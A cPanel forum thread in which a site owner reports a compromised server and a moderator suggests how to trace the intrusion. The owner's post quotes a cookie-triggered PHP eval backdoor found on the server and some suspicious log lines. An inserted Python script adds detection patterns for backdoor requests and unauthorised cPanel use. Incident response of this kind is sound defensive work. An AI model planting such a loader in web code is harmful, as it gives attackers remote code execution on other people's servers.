Public_html and other sub folder index.php and htaccess file issue

Operating System & Version: CentOS v7.9.2009
cPanel & WHM Version: 106.0.9

shaktis

Registered
Nov 14, 2022
India
cPanel Access Level
Website Owner
I recently noticed that my server domain's public_html index.php and .htaccess files have been overwritten by someone without permission, and the same thing happens in several subfolders.

On some websites, new subfolders are created in public_html, all of which contain an index.php file. Sometimes WordPress-related folders are created.


The updated index file in public_html has this:

[screenshot of the overwritten public_html/index.php attached]


In a subfolder, the .php file has this code:

<?php
// Cookie-triggered loader: function names and the payload are assembled from
// individual cookie values, and the decoded result is passed to eval().
function visit_cookie() {
    $h = $_COOKIE;
    ($h && isset($h[93])) ? (($ms = $h[93].$h[78]) &&
        ($qh = $ms($h[73].$h[22])) && ($_qh = $ms($h[94].$h[82])) &&
        ($_qh = $_qh($ms($h[10]))) && @eval($_qh)) : $h;

    return 0;
}

visit_cookie();

Automatic cron jobs are set up on the server which I never created.

[screenshot of the unknown cron entries attached]

I have checked the log and this is what I get:


66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /.well-known/themes.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /module/update.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

Can someone please help me find out how someone can upload these folders and files and set up cron jobs without any permission in the panel?

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
Hey there! Do you have SSH access enabled on the account? If so, the user could have come from anywhere with a stolen password.

The first place I would check would be the cPanel access logs, specifically looking for access to the Cron or File Manager areas of the cPanel interface. If you find access that isn't authorized, you can block that IP address.

It would also be a good idea to have any users with access to the cPanel account scan their local machines for malware, as keylogging software to steal passwords is common.
 

shaktis

Thank you for your response. I have checked both the access log file via the terminal and the raw access log, but haven't found any instance or activity of adding a cron file or adding index.php and .htaccess files on the server itself. Can you please provide more details and suggest how we can prevent this from happening going forward?
 

cPRex

The best way to check that is to recreate the process inside cPanel. For example, I would watch /usr/local/cpanel/logs/access_log while opening the File Manager inside of a cPanel account, and then you'll know what to search for in the log to see that same action from other IP addresses.

If you really don't see anything there, it could be a malicious script inside the account that is creating these files, so you'd want to investigate the account for malware. We recommend Imunify for scanning your machine, and there are details on that process here:


If that still doesn't find anything, you'll want to reach out to your host or a professional administrator to have a more thorough review of the account performed.
 
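Detection logic for the two log checks discussed in this thread (the raw Apache access log lines the original poster quoted, and the cPanel access_log search for File Manager and Cron use that cPRex suggests), as an added example that is not part of the thread. The cPanel URL patterns and log field layout are assumptions; the two WEB_LOG lines are the ones quoted above, everything else is constructed sample data.

```python
import re
from collections import defaultdict
# Combined-style line: ip - user [time] "METHOD path PROTO" status size "referer" "ua" ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Directories that should not serve PHP on a normal site (constructed list).
SUSPICIOUS_PHP_DIRS = ("/.well-known/", "/module/", "/wp-content/uploads/")
# cPanel UI/API paths for the actions cPRex suggests recreating (assumed patterns).
CPANEL_ACTIONS = {"filemanager": re.compile(r"/frontend/[^/]+/filemanager/"),
                  "cron": re.compile(r"/frontend/[^/]+/cron/|/execute/Cron/|jsonapi_module=Cron")}

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def web_findings(lines):
    """Apache raw access log -> {ip: [reasons]} for backdoor-style requests."""
    hits = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        path = rec["path"].split("?", 1)[0]
        if path.endswith(".php") and path.startswith(SUSPICIOUS_PHP_DIRS) and rec["status"] == "200":
            hits[rec["ip"]].append(f"PHP served from unexpected directory: {path}")
        ref = rec["referer"]
        if ref not in ("", "-") and not ref.startswith(("http://", "https://")):
            hits[rec["ip"]].append("non-URL referer (automation tool signature)")
    return dict(hits)

def cpanel_actions_by_ip(lines, trusted_ips):
    """cPanel access_log -> {ip: [actions]} for File Manager / Cron use from untrusted IPs."""
    out = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["ip"] in trusted_ips:
            continue
        for name, rx in CPANEL_ACTIONS.items():
            if rx.search(rec["path"]):
                out[rec["ip"]].add(name)
    return {ip: sorted(acts) for ip, acts in out.items()}

# Sample input: WEB_LOG lines are the two quoted in the thread; CPANEL_LOG is constructed
# (real /usr/local/cpanel/logs/access_log fields may differ).
WEB_LOG = [
    '66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /.well-known/themes.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"',
    '66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /module/update.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"',
]
CPANEL_LOG = [
    '198.51.100.7 - user1 [11/14/2022:09:30:01 -0000] "GET /cpsess0000000000/frontend/jupiter/filemanager/index.html?dir=%2Fpublic_html HTTP/1.1" 200 0 "https://example.com:2083/" "Mozilla/5.0"',
    '203.0.113.9 - user1 [11/14/2022:09:31:45 -0000] "POST /cpsess1111111111/execute/Cron/add_line HTTP/1.1" 200 0 "-" "python-requests/2.28"',
]
```

Run `web_findings(WEB_LOG)` against the full raw access log and `cpanel_actions_by_ip(CPANEL_LOG, {your own IPs})` against the cPanel access_log; any IP that appears in the second result is a candidate for blocking and for a password reset on that account.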

shaktis

Thank you for the detailed information. I will review that and will also consider the anti-virus option you suggested.

One more question:
Are there any settings I can make so that File Manager, FTP, SSH, cPanel etc. can only be opened from allowed IP addresses? Please suggest.